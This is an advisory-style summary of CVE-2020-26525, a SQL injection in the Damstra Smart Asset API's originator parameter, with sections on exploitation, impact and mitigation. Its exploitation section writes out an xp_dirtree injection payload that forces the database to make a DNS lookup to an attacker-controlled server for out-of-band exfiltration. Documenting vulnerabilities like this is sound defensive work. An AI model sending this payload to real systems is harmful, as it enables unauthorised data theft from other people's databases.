CVE-2020-26525

Vulnerability

Damstra Smart Asset version 2020.7 contains a SQL injection vulnerability in the API/api/Asset endpoint's originator parameter. The input is not sanitized, allowing an attacker to inject arbitrary SQL commands. This is demonstrated in [2] by injecting a payload that uses xp_dirtree to force a DNS lookup to an attacker-controlled server.

Exploitation

An attacker can send a crafted HTTP GET request to /API/api/Asset with a malicious originator parameter containing SQL injection payload. The payload in [2] uses declare @q varchar(99); set @q='\\\\\\qoe'; exec master.dbo.xp_dirtree @q;-- to initiate a DNS lookup. An Authorization header with a valid bearer token is required, but the attack still triggers the SQL injection even if authentication fails (the 401 response occurs after the injection). The remote listener receives the DNS lookup from the target.

Impact

Successful exploitation allows an attacker to force the MSSQL database to initiate outbound connections to arbitrary DNS servers. This can be used to exfiltrate data via DNS, or to perform secondary attacks. The injection itself is within the database context, and the attacker does not directly retrieve data from the HTTP response but uses side-channel (DNS) to extract information.

Mitigation

As of the available references, no official patch has been released. The vendor's website [1] provides product information but no security advisory. Users should apply input validation and parameterized queries to prevent SQL injection. If possible, restrict outbound traffic from the database server. The CVE publication date is 2020-10-02, and no fix is listed.